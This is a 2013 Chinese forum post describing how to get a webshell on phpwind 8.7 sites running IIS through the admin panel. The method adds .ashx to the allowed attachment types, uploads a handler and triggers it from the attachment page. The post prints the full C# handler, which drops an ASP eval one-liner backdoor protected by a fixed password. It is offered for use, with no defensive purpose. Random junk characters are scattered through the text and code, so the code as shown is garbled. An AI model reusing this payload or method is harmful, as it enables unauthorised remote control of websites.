找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2071|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小& R% N- G* l  ^: d# r6 n, i' h

: @# f" s4 J& k' B群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
7 w7 ~) a0 @& R) L; E
* q) N! a1 ^% J1 b  k# E发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
* ^* w; j. ], p : W- v( N; {% }0 c3 q8 F. b
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
" H; j7 o$ |1 s
' N, p2 @, O8 P1 `5 I; ?! V打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
2 y4 @1 h& I+ B# n5 m
1 P2 h, g0 j2 s% Y; `下面是代码:
) `) C/ R7 J4 @6 l" Z
; s& T# R3 e7 ?8 o6 E1 X- z0 d<%@ WebHandler Language="C#"Class="Handler" %>& U! s  E. i. ]8 C* Z: ]
using System;
' T% D3 z& R. Z# h* A; f+ I+ D# _using System.Web;; o. t; \5 D$ `. u2 B
using System.IO;
8 t8 T  F: n) W8 Q# T: i1 l0 Wpublic class Handler : IHttpHandler {0 y! w* m0 b, z/ |! q8 Y) t& k
public void ProcessRequest (HttpContext context) {- b, l; T# a& }' H2 n8 x$ R
context.Response.ContentType = "text/plain";
4 G  C' `" Y2 A, w% e) MStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));+ F7 O0 @* n5 t
file1.Write("<%eval request(\"r00ts\")%>");! z8 T: K* X( m
file1.Flush();
2 e% I  z# S9 v, t3 v) j3 P7 g( l8 Z5 v* cfile1.Close();' d& Q4 H$ W2 F. m
}$ v) [1 e2 T! S# Q
public bool IsReusable {
5 j3 h( n( }- _  j. A8 mget {
1 c- C7 \8 C* N! l  P; D9 r, a$ Jreturn false;
# o- f/ N1 X  F3 E* M% q( c}2 W7 Q% z, q! Q3 r# G
}) K" F, k$ x. k) R6 N/ h
}
1 T  B5 U4 }) N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表